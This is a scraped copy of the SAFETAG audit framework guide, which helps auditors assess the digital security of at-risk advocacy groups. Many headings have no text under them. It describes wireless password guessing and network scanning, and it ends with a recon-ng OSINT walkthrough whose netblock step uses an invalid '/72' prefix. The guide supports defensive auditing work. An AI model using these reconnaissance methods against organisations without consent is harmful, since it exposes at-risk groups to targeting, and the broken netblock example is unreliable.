Table of Contents
SAFETAG Logo

A Security Auditing Framework and Evaluation Template for Advocacy Groups

Guide

License

SAFETAG resources are available under a Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) License

The audit framework and checklist may be used and shared for educational, non-commercial, not-for-profit purposes, with attribution to Internews. Users are free to modify and distribute content under conditions listed in the license.

The audit framework and checklist is intended as reference and the authors take no responsibility for the safety and security of persons using them in a personal or professional capacity.

Attribution for content from other Licenses

Usage of "SAFETAG"

SAFETAG is itself a framework and template for organizational audits. As such, audits performed which use or adapt SAFETAG materials may be referred to as "adapting the SAFETAG methodology" or "based on the SAFETAG framework", and similar phrasings, but may NOT be called "SAFETAG audits".

This is not intended to imply that an audit using any or all of the SAFETAG materials need to refer to SAFETAG at all.

This usage policy does not affect the distribution of SAFETAG materials, covered in the license statement above.

Introduction

The Security Auditing Framework and Evaluation Template for Advocacy Groups (SAFETAG) is a professional audit framework that adapts traditional penetration testing and risk assessment methodologies to be relevant to small, non-profit, human rights organizations based or operating in the developing world, taking into account the capacity constraints and unique threats faced in this community.

SAFETAG uses assessment activities derived from standards in the security auditing world and best-practices for working with small scale at-risk organizations to provide organization driven risk assessment and mitigation consultation. SAFETAG auditors lead an organizational risk modeling process that helps staff and leadership take an institutional lens on their digital security problems, conduct a targeted digital security audit to expose vulnerabilities that impact the vital processes and assets identified, and provide post-audit reporting and follow up that helps the organization and staff identify the training and technical support that they need to address needs identified in the audit, and in the future.

[email protected] | https://safetag.org

The SAFETAG Audit Framework Core

The SAFETAG audit consists of multiple information gathering and confirmations steps as well as research and capacity-building exercises with staff organized in a collection of objectives, each of which supports the core goals of SAFETAG, creating a risk assessment while also building the capacity of the organization.

These objectives provide collections of approaches and activities to gather and verify information in both technical and interactive/social methods, assess and build capacity, and targeted exercises with walk-through instructions for many of these.

These are not meant to be a "checklist" or even a prescribed set of actions -- indeed, experienced auditors will deviate strongly from many of the specific activities. These provide a focused "minimal set" of activities only.

Indeed, many objectives and their specific exercises overlap or can be done together -- on-site interviews with staff can coincide with assessing their devices and keeping one's eyes open for physical security issues. The data assessment exercises may provide enough information that other staff engagements are unnecessary.

The Life Cycle of an Audit

The audit process in very cyclical. Newly identified threats, vulnerabilities, capabilities, and barriers impact activities that have and have yet to be run. At the same time the auditor, through conversations, training, and group activities is actively building the organization's agency and addressing time-sensitive or critical threats that are possible within the time frame. This iterative process eventually leads to a point where the auditor is confident they have identified the critical and low hanging fruit, and is confident the organization is capable of moving forward with their recommendations.

Each objective requires a certain base of information, and outputs more information into this cyclical process. Each objective has a "map" of the data flow that it and its specific activities provide based on this map:

SAFETAG Data Flow
SAFETAG Data Flow

While more completely defined below in the Risk Assessment and Agency Building sections, a brief overview of the data flow components:

To make SAFETAG approachable, a core evaluation template which links together a series of specific objectives, each with a variety of linked activities, that contribute towards the goals and their required information needs is represented here. Experienced Auditors will likely come up with their own approaches, and the SAFETAG project welcomes such contributions.

Risk Assessment & Analysis

Functionally, SAFETAG is a digital risk assessment framework. Risk assessment a systematic approach to identifying and assessing risks associated with hazards and human activities. SAFETAG focuses this approach on digital security risks. A SAFETAG audit will work to collect the following types of information in order to assess the risks an organization faces.

Risk is the current assessment of the possibility of harmful events occurring. Risk is assessed by comparing the threats an actor faces with their vulnerabilities, and their capacity to respond to or mitigate emergent threats.

The SAFETAG evaluation revolves around collecting enough information to identify and assess the various risks and an organization and its related actors face so that they can take action strategically.

The Risk Equation
The Risk Equation

Program Analysis

Program analysis identifies the priority objectives of the organization and determine its capacities. This process exposes the activities, actors, and capacities of an organization.

Activities

Definition: The practices and interactions that the organization carries out in order to accomplish their goals.

Example: This includes any activity that the organization carries out to accomplish its goals and those that allow the organization to function (publishing, payment, fund-raising, outreach, interviewing.)

Actors

Definition: The staff, volunteers, partners, beneficiaries, donors, and adversaries associated with the organization.

Example: The core organizational staff, the volunteers, maintenance, cleaning, security, or other non-critical staff, the partner organizations, the individuals and groups that the organization provides services to, groups of unorganized individuals who are opposed to organizational aims, governmental and non-governmental high-power agents and organizations that are opposed to the organizations aims.

Vulnerability analysis

Understand the organisation’s exposure to threats, points of weakness and the ways in which the organisation may be affected.

Vulnerability

Definition: A attribute or feature that makes an entity, asset, system, or network susceptible to a given threat.

Example: This can include poorly built or unmaintained hardware, software, or offices as well as missing, ignored, or poor policies or practices around security.

Threat Analysis

Threat analysis is the process of identifying possible attackers and gathering background information about the capability of those attackers to threaten the organization. The basis of this information is a potential threats history of carrying out specific threats, their capability to carry out those threats currently, and proof that the threat has intent to leverage resources against the target.

Threat

Definition: A threat is a possible attack or occurrence that has the potential to harm life, information, operations, the environment, and/or property.

Example: Threats can range from fire, or flood, to targeted malware, physical harassment, or phishing attacks.

Threat History

Definition: What types of threats has the attacker used historically. And, what types of actors have been targeted by those threats.

Example:

Threat Capability

Definition: The means that the attacker has to carry out threats against the organization.

Example: This includes, but is not limited to technical skill, financial support, number of staff hours, and legal power.

Threat Intent

Definition: The level of desire for the attacker to carry out threats against the organization.

Example: Intent can be goals or outcomes that the adversary seeks; consequences the adversary seeks to avoid; and how strongly the adversary seeks to achieve those outcomes and/or avoid those consequences.

Agency Building

SAFETAG differs from many risk assessment tools because it aims to build the host's and staff's capacity so that they are able to address the risks that the auditor has identified. SAFETAG is designed to provide in-audit activities and training that increase an organizations agency to seek out and address security challenges within their organization. To do this an auditor must collect information that allows them to identify organizational areas of strength and weakness (expertise, finance, willingness to learn, staff time, etc.)

A common refrain, among auditors, software developers and other specialists in this sector, is that digital security is not about technology; it is about people. This is undeniably true, and even the previous SAFETAG modules — despite their more direct fixation on technology — acknowledge this insight by emphasizing the educational and a persuasive roles played by your findings report.

Capacity

Definition: The combination of strengths, attributes and resources available within the organization that can be used to reduce the impact or likelihood of threats.

Example: This includes, but is not limited to technical skill, financial support, staff and management time, relationships, and legal power.

Barriers

Definition: The combination of weaknesses, assumptions, regulations, social or cultural practices, and obligations that get in the way of an organization implementing an effective digital security practice.

Example: Examples can include a lack of funding, lack of authority within an organization to mandate practices to their staff, resistance to change, high staff turnover, or digital illiteracy.

Operational Security

"Also be aware that local groups may not be able to accurately gauge the safety of their communications with you. Sometimes they underestimate the likelihood of risk - at other times, they can wildly overestimate the risk. Either way, trainers need to navigate this issues carefully and respectfully with a "do no harm" approach that respects the reported needs, context, and experiences of your local contact and potential trainees." - Needs Assessment: Level-Up 1

Summary

Below are the baseline operational security guidelines for a SAFETAG audit. Activity specific operational security guidelines are contained within each activity.

Purpose

An audit uncovers an array of sensitive information about an organization. For some at-risk populations the mere act of getting a digital security audit can increase their likelihood of being actively attacked by an adversary. The foundation of the SAFETAG process is the goal of increasing the safety of the host organization, its staff, and the auditor. It is vital that an auditor weigh the possible risk an audit may incur on the organization or the auditor against the possible outcomes of an audit.

Approaches

Resources

SAFETAG Methods

Preparation

Summary

This component consists of trip preparation activities that are needed to ensure the technical and facilitated components of the audit are able to be conducted effectively and within the on-site time-frame and in coordination with the organization.

Purpose

A SAFETAG audit has a short time frame. Preparation is vital to ensure that time on the ground is not spent negotiating over the audit scope, updating the auditors systems, searching for missing hardware, or refreshing oneself with the SAFETAG framework. To that end negotiations with the host organization help reveal if the organization has the capacity to undertake the audit and respond to its findings.

Guiding Questions

The Flow of Information

Preparation Information Flow
Preparation Information Flow

Approaches

Outputs

Operational Security

Resources

Facilitation Preparation

Password Dictionary Creation

Other Pre-Engagement Resources

Incident Handling Resources

Data Security Standards

Sensitive Data & Information Guides

Incident Handling Resources

Activities

Assessment Plan

Summary

This component allows an auditor and host to come to an understanding of the level of access that an auditor will have, what is off limits, and the process for modifying the scope of the audit when new information arises. 13,14 This component consists of a process where the auditor collaboratively creates an assessment plan with key members of the organization.

A core tenet of SAFETAG is building agency in organizations to improve their digital security. To that end, collaboratively creating an assessment plan with the organization helps to clarify not only the audit scope - from discussing what sensitive data may be exposed to what systems may be disrupted in the process of the audit - but it also helps reveal the ability of the organization to support and respond to the audit findings.

Overview
Materials Needed
Considerations
Walkthrough

Auditors are encouraged to use, or at least reference, the SAFETAG Agreement Generator, a python script which provides a decision tree covering the above points, and builds a basic, clear-language agreement which can be translated and formalized as needed. Sample outputs and a diagram of the full decision tree are available in the "outputs" folder of the Agreement Generator repository. This replaces the draft agreement previously part of SAFETAG.

Recommendation

Confidentiality Agreement

Summary

Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization and the outcomes of the audit.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a DRAFT Engagement and Confidentiality Agreement. See also the in-progress SAFETAG Agreement Generator for more advanced and flexible "plain language" agreement text and guidance on selecting which clauses to include.

Recommendation

Incident Response and Emergency Contact

Summary

Incident Response setups up a procedure for identifying what counts as an incident during an audit, as well as incident handling and response in the event that auditor cause or uncover a security incident during the course of the assessment. 29,30

It is important to know these procedures in handling incidents to protect data integrity and audit trail to be used for investigation and collection of information. ##### Overview

Materials Needed
Considerations
Walkthrough

What counts as an incident should be agreed with the organization's management during the agreement phase, and should include possibilities informed by the Context and Technical Research work.

Incidents can include problems such as insider threats, active remote access malware systems, or the discovery of physical surveillance of the office, as well as many other possibilities. The auditor must use their best judgement along the SAFETAG Auditor Code of Conduct, their agreement with the organization, personal ethics, legal reponsibilities, and balance this in the frame of the organization's context, capacity, and the need to in good faith gain the trust of the staff of the organization to fulfill a successful audit.


Malware / Remote Access

For the implementation of mitigation measures, you can refer the auditees to a third party. This may be the organization's IT staff, a rapid response helpline, a malware researcher, etc.

Some of the mitigation steps can be implemented by the user, following the instructions included in the Rapid Response Network's Digital First Aid Kit.

You should consider a compromise serious and coordinate an incident response if any of the following is happening:

Possible mitigation steps are below. This step should not take more than 2 hours, and the auditor should coordinate the response, rather than carry it out themselves. The auditor should keep in mind the organization's capacity and be extremely careful when reformatting devices, as there may be critical programs which the organization does not have the installation media / license keys for any more, or critical data on the disk which did not come up in other discussions. Check to see if the organization has trustworthy operating system installation media and license keys. In almost every situation, these mitigations should be done post-audit so as to ensure the audit itself has time to complete and be thorough.

Insider Threat

Insider Threat

Insider Threat refers to any threat to an organization that comes within or inside the organization. These can include (but not limited to)

- Employees
- Former employees
- Contractors
- Interns___
Active Surveillance

To be developed.

Travel Checklist

See the Appendix for a sample travel kit / checklist

Audit Timeline and Planning

Review these notes in preparation for the audit as you begin to map out your schedule. This provides a rough, suggested outline of how to schedule your time on site for a SAFETAG audit, and some reminders of the work you need to have completed before arriving in country.

Prepare for Uncertainty

The SAFETAG roadmap is a crisp, clear data flow of inputs to outputs. Reality, generally speaking, is less direct. There are a few core parts of the audit process that force action, but others are more flexible. Outcomes of your discussion and exploration of the network will also de-rail the process in impossible-to-predict ways. The pre-audit interviews and your own contexts research, research on the organization, and preparation are meant to give you the best possible idea of what situation you'll walk in to, but even with all of that, frankly, shit happens.

Before Travel

First Day

Priorities for the first day include meeting staff (even, possibly especially, for the more technical auditor). There is a strong temptation to dive in and get started, but establishing connections with the staff - especially those you haven't met through interviews - is key. You may discover hidden sources of talent or resistance, historical information, and new parts of the infrastructure or practices and policies that you may not have yet found.

Early steps

From a data-gathering point of view, the first steps are to try and access the wireless network by password guessing, but also to connect to the network and capture traffic for analysis overnight. This provides other views on the actual technology and services used on the network, different both from the management and IT view as well as other tools discussed by staff.

First or Second day

Further Days (on Location) The next day you’re on location, you have hopefully looked through the research data you gathered, and have some specific follow-up things to investigate. It’s also now time to start going through the audit tasks.

Final Day (on Location)

Exploration and check-ins

Throughout the entire audit, aggressively make time to engage with staff - stop for coffee, eat lunch with them, have conversations. This can be integrated in to other parts of the process, such as the user device assessments, as well as being completely independent and natural. Having better connections with staff will make the group exercises, especially the risk assessment work, flow much better.

Whenever you set off a scan (airodumping, nmap, openvas...) are good times to stand up and walk around.

Debrief and Setting Expectations

Largely covered in the debrief section, making time at the end of the (often hectic) audit week is very important to making sure the next few steps are absolutely clear in terms of timelines and communication protocols.

Clean up

If you have been using paper or post-it notes during the audit, be sure you securely destroy them (by shredding, burning, or tearing into small pieces) before you leave the site on the last day. By the same token, any digital reports should be stored on secure media and securely deleted from all other locations. See the operational security section and per-item notes for further details. Clean off any whiteboards used, and check any camera used to remove sensitive photos.

Follow up care and Reporting

See the reporting sections for specific details here, but a series of check-ins with the organization to support their ability to respond to any incidents, understand further topics from the debrief, and to help provide them a timeline to expect the final report is valuable in maintaining their engagement post-audit to support the needed changes.

Context Research

Summary

This component allows the auditor to identify the relevant regional and technological context needed to provide a safe and informed SAFETAG audit. This component consists of desk research that is collected and analyzed by the auditor, as well as inputs from the Interview component.

Purpose

Analysis of context is the foundation of effective risk management. Both at-risk organizations and auditors will develop assumptions based upon their experience. It is important that an audit is based on information that is current and accurate.

Checking the assumptions both of the organization and of the auditor by researching the current regional and technological context will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations.

The Flow of Information

Information Flow
Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Other Context Analysis Methodologies

Threats to the Auditor

Have aid workers faced retribution for their work in the region?

Is it safe to do digital security work in the region?

Is the area safe to travel to?

Targeted Threats for the organization

Is the group facing any legal threats because of its work?

Does the organization face any targeted threats because of their work?

General Threats for the organization

What general non-governmental threats does the organization face?

What cyber-security practices is the government using?

What general cyber-security threats is the organization facing?

What level of technology is available in the region?

Activities

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

Regional Context Research

Summary

This exercise focuses on research and re-confirmation of regional issues from general trends to specific legal restrictions and safety concerns, as well as current news and persistent challenges.

Overview
Materials Needed
Considerations
Walkthrough

Cross-check reports on regional threats facing organizations with their focus area.

Identify any legal risks associated with conducting the audit. Secure communications and storage, network forensics, device exploitation, digital security training.

Identify any infrastructural barriers to adopting digital security practices.

Explore the security landscape of hardware and software identified in interviews by conducting a basic vulnerability analysis.

Technical Context Research

Summary

This exercise focuses on research into the technical capacity of potential threat actors, including both historical attack data and any indicators of changes to their capacity. Auditors are encouraged to create a summary of their findings for inclusion in the audit report and for sharing (if operational security and the agreement with the organization permits) among trusted networks.

Overview
Materials Needed
Considerations
Walkthrough

Thoroughly research technical attack history for the country/region, with a focus on identifying attacks which may focus on the work of the organization. Auditors are advised to track both capability (known attacks and tools) and intent (attempts to aquire tools, changes in policies, public statements). For auditors who intend to share their research efforts, it is incredibly useful to include key quotes and data directly into relevant sections of this document, providing a reference or link back to the original report. This allows future reviewers to more immediately understand your assessment, what it has included and not, and incorporate new material.

It is useful to categorize the research into categories:

Keep a separate running list for: * Targeted Populations (Are specific types of people targeted/surveilled due to their identity/race/background?) * Targeted Activities (Are specific activities abnormally targeted - e.g. protests, calls for government transparency, etc.?) * Sensitive Events (Are there specific historic/anniversary/holiday dates, upcoming elections (https://www.ndi.org/elections-calendar), or other known events to be noted?) * Sources and New Additions (What resources have you found, ?)

If the country(ies) of interest are in the Freedom on the Net report, you will be able to gather a great deal of baseline information across all the sections by reading through the relevant country reports. The key internet controls found in the Freedom on the Net report ( https://freedomhouse.org/report/key-internet-controls-table-2016 ) guided many of the categories used here, reducing the effort required to create a baseline report. More advanced reporting could include references to the CAPEC (Common Attack Pattern Enumeration and Classification) taxonomy, and auditors may also be interested in leveraging the STIX standard to better automate sharing and further research into specific threats using threat information sharing platforms.

Additional organizations which regularly release in-depth digital security focused country reports which are strongly recommended to review in creation of an assessment are listed below. These sources often link to their primary sources or other groups doing dedicated research on the country or topic for further research. In addition, sub-sections list topic-specific research ideas.

Below are definitions and resources for the research categories which can help build out a country or regional assessment useful for the auditor, the organization, and for the broader organizational security community.

Capacity Assessment

Summary

In this component the auditor engages with staff through interviews and conversations to identify the organization's strengths and weakness (expertise, finance, willingness to learn, staff time, etc.) to adopting new digital and physical security practices. The auditor uses this information to modify the audit scope and recommendations accordingly.

Purpose

Knowing an organization's strengths and weaknesses allows the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. The auditor will use this assessment in preparing for the audit itself as well as when evaluating the difficulty of a recommendation. This information also provides a starting place for understanding the organization's current use and understanding of technology, digital security, and current threat landscape, as well as revealing elements of an organization's workflow, infrastructure and even vulnerabilities that you might otherwise have overlooked.

The Flow Of Information

Audit Preparation Information Flow
Audit Preparation Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Background Interview Approaches

Activities

Interviews

Summary

The auditor conducts interviews with various staff members to gather information on the organizations risks and capacity.

Q&A sessions are unabashedly white box aspects of a security assessment, and you will occasionally hear push-back along the lines of, "You wouldn't have found that thing if we hadn't told you about this other thing." Compelling black box findings certainly do have an advantage when it comes to persuasiveness, but obtaining them can be quite time-consuming, so relying exclusively on vulnerabilities that you can identify without "help" is generally a mistake in this resource-constrained sector.

Overview
Materials Needed
Considerations
Walkthrough

The questions below are roughly divided into categories for management, program staff, and technical staff. The questions for technical staff may be best asked of the manager or another point of contact. Within that section, there are specific questions that often only actual IT staff are likely to be able to answer. An auditor may find value in re-asking the same questions to multiple staff members. Specifically, however, the "Baseline Threat Identification Questions" should be asked of whoever the auditor feels most able or willing to answer them.

In all cases, the HCD Toolkit recommends that you "warm up the participant with questions they are comfortable with." 36 -- balance this against not asking questions which you should already know from basic organizational research, followed with informative questions which "prompt bigger, even aspirational, thinking that they may not be accustomed to on a daily basis." 37

Management and Baseline Questions

Go Specific

"Dig deeper on the challenge at hand & prompt with ‘what if’ scenarios."

Go Personal

"Dig deeper on the practices outside of work & prompt with ‘what if’ scenarios."

Program Staff Questions

For organizations with signficant online operations/programs, the following questions may be asked of the management point of contact and/or a program staff member.

Technical Staff Questions

Ask these of the most technical staff member you are in touch with. If the organization has dedicated IT support, this section also includes specific questions for IT.

IT Only

Baseline Threat Identification Questions
Questions for Known High Risk Organizations

See Guiding Questions for High Risk Organizations if there are concerns that the organization may be targeted by advanced threat actors.

Guiding Questions for High-Risk Organisations

Summary

This additional interview activity is to identify if there are any indicators that the organization may have already been attacked and/or compromised, or if someone they know has faced advanced threats. It should help identify what threats / threat actors they are dealing with, and their intent. This will help the auditor prioritize work with the organisation during the audit and follow up and understand whether the auditor has the expertise to address or understand the threat or if outside expertise is needed.

Overview
Materials Needed

~45 minutes per interview / staff member 1 hr interview as an org, depending on organisational culture

Considerations

Operational Security

Psychological Considerations

Walkthrough

Individual Interview

Group Interview

NOTE: Remind the staff that if it's not public within the organisation and/or happened to a personal account, then don't share it during this session.

NOTE: Repeat above questions per incident

NOTE: Could lead to further conversations about what data they have, what assets are the most important, sensitive and possibly targeted

Recommendation

Recommendations will depend on the advanced threats raised during the interview. See the Advanced Threat method for details.

Capacity Assessment Checklist

Summary

A monolithic, one-time interview with key staff is not always possible or advisable, but interacting with a variety of staff exposes valuable information about every aspect of the audit, from vulnerabilities to capacity to hidden barriers. This serves as a "cheat sheet" of some topics to explore both during the planning and preparation phase and throughout the audit process.

Walkthrough

"Homework"

Organizational

Contextual / Background / Threat information

Technical

Preparation Support

Practices and behaviors

Reconnaissance

Summary

The remote assessment methodology focuses on direct observation of an organization and their infrastructure, consisting of passive reconnaissance of publicly available data sources ("Open Source Intelligence") This allows the auditor to identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Purpose

While much of SAFETAG focuses on digital security challenges within and around the office, unintended information available from "open sources" can pose real threats and deserve significant attention. This also builds the Auditor's understanding of the organization's digital presence and will guide specific vulnerabilities to investigate once on site.

The Flow Of Information

Reconnaissance Information Flow
Reconnaissance Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

This Section:

Resources

Open Source Intelligence (General)

Organizational Information Gathering

Searching

Pastebin Searching

Recon-ng

Activities

Manual Reconnaissance

Summary

This exercise suggests some targeted online search tools and tricks to gather information leakages from organizations. While many advocacy, activism, and media/journalism focused organizations are very public as part of their operations, the searches suggested here aim to explore data that could be used to better attack or socially engineer an organization.

Overview
Materials Needed
Considerations
Walkthrough

These custom and more manual approaches work excellently in combination with automated tools such as recon-ng or the commercial Maltego. Working with both these tricks and the automated tools, feeding information learned from one back to the other, is a powerful way to unearth large amounts of information about an organization.

Much of the tools and further guidance is well covered in the references for the Reconnaissance method, a small selection of starting points is mapped out below.

Take care, however, to not waste time on this; using image information tools on every photo on an organization's website, or researching every linked social media account may not provide further valuable information - step back and judge the value of digging deeper - are you finding adversaries? Are you finding information that the organization may not want online? Are there other methods which might be more appropriate to apply?

Search Engines

Google dorking tricks:

Social Media / Account Discovery
Additional Tools
Pastebin Searching
Working with Images
Recommendation

Automated Reconnaisance

Summary

This component allows the auditor to quickly identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Overview
Materials Needed
Considerations
Walkthrough

Both Recon-ng and Foca are open source reconnaissance tools with many available plugins. Foca is, out-of-the-box, more aimed at extracting metadata from documents and images, whereas Recon is slightly more focused on finding digging into domains, subdomains, contacts, and the more network-level information. Both tools are best used in addition to critical thinking and manual exploration, and require "seed" inputs to get started and careful curation to remove false leads.


Recon-ng

Installing Recon-ng

For full instructions, see the Recon-ng Getting Started Instructions

Using Recon-ng

NOTE: This guide is based upon the data flow documentation from the Recon-ng website

By pressing tab twice you can use auto-completion.

[recon-ng][default] >
add         exit        load        record      search      show        use
back        help        pdb         reload      set         spool       workspaces
del         keys        query       resource    shell       unset

This works even in commands.

[recon-ng][default] > show
banner           credentials      hosts            locations        options          schema
companies        dashboard        keys             modules          ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         workspaces

Using recon modules

The recon modules are named in a very specific fashion to help the user understand the flow of data inside the tool. Modules use the syntax <methodology step>/<input table>-<output table>/<module>. The inputs are the first part of each module, and the outputs are the second part. The module name itself is the tool used to process the data. So, recon/domains-hosts/brute-hosts takes domain names (websitename.org) as an input, and outputs hostnames (extranet.websitename.org, etc.). If you provide the name of the specific module, recon-ng can figure it out (though tab completion doesn't help) -- for example, use breachalarm works just as well as use recon/contacts-creds/breachalarm

You can also search modules by their inputs or outputs. search domains- displays all modules that take domain names as their input, and search -contacts displays all modules that outputs contact information.

Preparing

Set verboseness on during the guide so that you can see everything that happens. (recommended to begin with)

[recon-ng][default] > set VERBOSE True

You can use auto completion to see all the possible keys you can add.

[recon-ng][websitename] > keys add
bing_api           facebook_secret    google_cse         jigsaw_username    pwnedlist_iv       twitter_api
builtwith_api      facebook_username  ipinfodb_api       linkedin_api       pwnedlist_secret   twitter_secret
facebook_api       flickr_api         jigsaw_api         linkedin_secret    shodan_api         virustotal_api
facebook_password  google_api         jigsaw_password    pwnedlist_api      sonar_api

Choose and add a key.

[recon-ng][default] > keys add bing_api TYPE_THE_KEY_VALUE_HERE
[*] Key 'bing_api' added.

You can list keys by using the command keys list Reference the Creating API Keys Section below for quick links to setting up popular APIs.

First steps

NOTE: This walkthrough is using sample data. Results will vary widely depending on the organization you are working with.

[recon-ng][default] > workspaces add websitename
[recon-ng][websitename] >
[recon-ng][websitename] > workspaces select default
[recon-ng][default] >
[recon-ng][default] > workspaces select websitename
[recon-ng][websitename] >

Display possible seed information by using auto-completion.

[recon-ng][default] > add
companies        credentials      hosts            locations        ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins

We will only use the organization's name, one domain, two netblocks (that we got by searching for other domains and ping-ing them), and two e-mails of the company we are looking for so we will add those.

First, add the company name.

[recon-ng][websitename] > add companies
company (TEXT): Websitename
description (TEXT):

Next, add the domain.

[recon-ng][default] > add domains websitename.org
[recon-ng][websitename] > show domains

  +--------------------------------+
  | rowid |     domain    | module |
  +--------------------------------+
  | 1     | websitename.org | base   |
  +--------------------------------+

[*] 1 rows returned

Next, add my contacts. we don't know much. But, we will add what we know.

[recon-ng][websitename] > add contacts
first_name (TEXT): Bob
middle_name (TEXT):
last_name (TEXT): Smith
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > add contacts
first_name (TEXT): Carl
middle_name (TEXT):
last_name (TEXT): Johnson
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] >

Finally we will add the ip address of their website.

[recon-ng][websitename] > add netblocks
netblock (TEXT): 174.154.167.69
[recon-ng][websitename] > add netblocks
netblock (TEXT): 96.127.170.121

Here it is in the database.

[recon-ng][websitename][shodan_net] > show netblocks

  +---------------------------------+
  | rowid |    netblock    | module |
  +---------------------------------+
  | 2     | 174.154.167.69 | base   |
  | 3     | 96.127.170.121 | base   |
  +---------------------------------+

Reconnaisance phase (netblocks example)

First, search for any modules that use netblocks as an input.

recon-ng][websitename] > search netblocks-
[*] Searching for 'netblocks-'...

  Recon
  -----
    recon/netblocks-hosts/reverse_resolve
    recon/netblocks-hosts/shodan_net
    recon/netblocks-ports/census_2012

In the case of recon/netblocks-hosts/shodan_net we can see that the "shodan_net" module is a reconnaissance module that takes in netblocks and produces hosts.

Lets try it out...

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] >

An empty command line can be daunting. If you are ever stuck on what current commands you can use the help command to see the current commands.

[recon-ng][websitename][shodan_net] > help

Commands (type [help|?] <topic>):

add             Adds records to the database
back            Exits the current context
del             Deletes records from the database
exit            Exits the framework
help            Displays this menu
keys            Manages framework API keys
load            Loads selected module
pdb             Starts a Python Debugger session
query           Queries the database
record          Records commands to a resource file
resource        Executes commands from a resource file
run             Runs the module
search          Searches available modules
set             Sets module options
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file
unset           Unsets module options
use             Loads selected module

Use the show info command to learn about the module and see what options are available.

[recon-ng][websitename][shodan_net] > show info

      Name: Shodan Network Enumerator
      Path: modules/recon/netblocks-hosts/shodan_net.py
    Author: Mike Siegel and Tim Tomes (@LaNMaSteR53)

Description:
  Harvests hosts from the Shodanhq.com API by using the 'net' search operator. Updates the 'hosts'
  table with the results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  LIMIT   1              yes       limit number of api requests per input source (0 = unlimited)
  SOURCE  default        yes       source of input (see 'show info' for details)

Source Options:
  default        SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL ORDER BY netblock
  <string>       string representing a single input
  <path>         path to a file containing a list of inputs
  query <sql>    database query returning one column of inputs

[recon-ng][websitename][shodan_net] >

It pulls directly from the netblocks source that we set up. Now, use run to run the module .

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > run

174.154.167.69
[*] Searching Shodan API for: net:174.154.167.69
[*] 174.154.167.69 (vps.websitename.org) - 7706
[*] 174.154.167.69 (vps.websitename.org) - 110
[*] 174.154.167.69 (vps.websitename.org) - 57
[*] 174.154.167.69 (vps.websitename.org) - 22
[*] 174.154.167.69 (vps.websitename.org) - 147
[*] 174.154.167.69 (vps.websitename.org) - 997
[*] 174.154.167.69 (vps.websitename.org) - 70
[*] 174.154.167.69 (vps.websitename.org) - 25

96.127.170.121
[*] Searching Shodan API for: net:96.127.170.121
[*] 96.127.170.121 (vps.websitename.org) - 7706
[*] 96.127.170.121 (vps.websitename.org) - 22
[*] 96.127.170.121 (vps.websitename.org) - 465
[*] 96.127.170.121 (vps.websitename.org) - 997
[*] 96.127.170.121 (vps.websitename.org) - 25
[*] 96.127.170.121 (vps.websitename.org) - 995
[*] 96.127.170.121 (vps.websitename.org) - 57
[*] 96.127.170.121 (vps.websitename.org) - 147
[*] 96.127.170.121 (vps.websitename.org) - 110
[*] 96.127.170.121 (vps.leillc.net) - 7070

SUMMARY
[*] 17 total (2 new) items found.

Since it promised me hosts, we will see what hosts it uncovered.

[recon-ng][websitename][shodan_net] > show hosts

  +---------------------------------------------------------------------------------------------------+
  | rowid |        host       |   ip_address   | region | country | latitude | longitude |   module   |
  +---------------------------------------------------------------------------------------------------+
  | 1     | vps.websitename.org | 174.154.167.69 |      |         |          |           | shodan_net |
  | 2     | vps.websitename.org | 96.127.170.121 |      |         |          |           | shodan_net |
  | 3     | vps.leillc.net    | 96.127.170.121 |        |         |          |           | shodan_net |
  +---------------------------------------------------------------------------------------------------+

[*] 3 rows returned

It seems the website leillc.net is obviously not associated with the company I am doing recon on. Since this module has finished, we will leave it using the back command.

[recon-ng][websitename][shodan_net] > back
[recon-ng][websitename] >

Now we will use the other two netblock- modules. We will show one more and then skip the second.

First we find all the possible modules using tab completion.

[recon-ng][websitename] > use recon/netblocks-
recon/netblocks-hosts/reverse_resolve  recon/netblocks-hosts/shodan_net       recon/netblocks-ports/census_2012
[recon-ng][websitename] > use recon/netblocks-

We are going to use reverse-resolve.

[recon-ng][websitename][census_2012] > use recon/netblocks-hosts/reverse_resolve

But, when we run it we get an error!

[recon-ng][websitename][reverse_resolve] > run
174.154.167.69
[!] Need more than 1 value to unpack.

OPTIONAL: To figure out what was going on, go back and then set DEBUG True to see the underlying error. The debug error message lets us know that we need to use full netmask syntax for netblocks. We will now add new netblocks in the correct format and then delete the old ones.

First we will add them correctly.

[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 177.154.167.69/72
[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 96.127.170.121/72

Now we have double of the same netblocks

[recon-ng][websitename][reverse_resolve] > show netblocks

  +---------------------------------------------+
  | rowid |      netblock     |      module     |
  +---------------------------------------------+
  | 2     | 174.154.167.69    | base            |
  | 4     | 177.154.167.69/72 | reverse_resolve |
  | 3     | 96.127.170.121    | base            |
  | 5     | 96.127.170.121/72 | reverse_resolve |
  +---------------------------------------------+

[*] 4 rows returned

Now that we know their rowid numbers, I can delete them.

[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 2
[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 3

And, re-running the module now works.

[recon-ng][websitename][reverse_resolve] > run

[*] 177.154.167.69 => dsl-177-154-167-69-dyn.prod-infinitum.com.mx
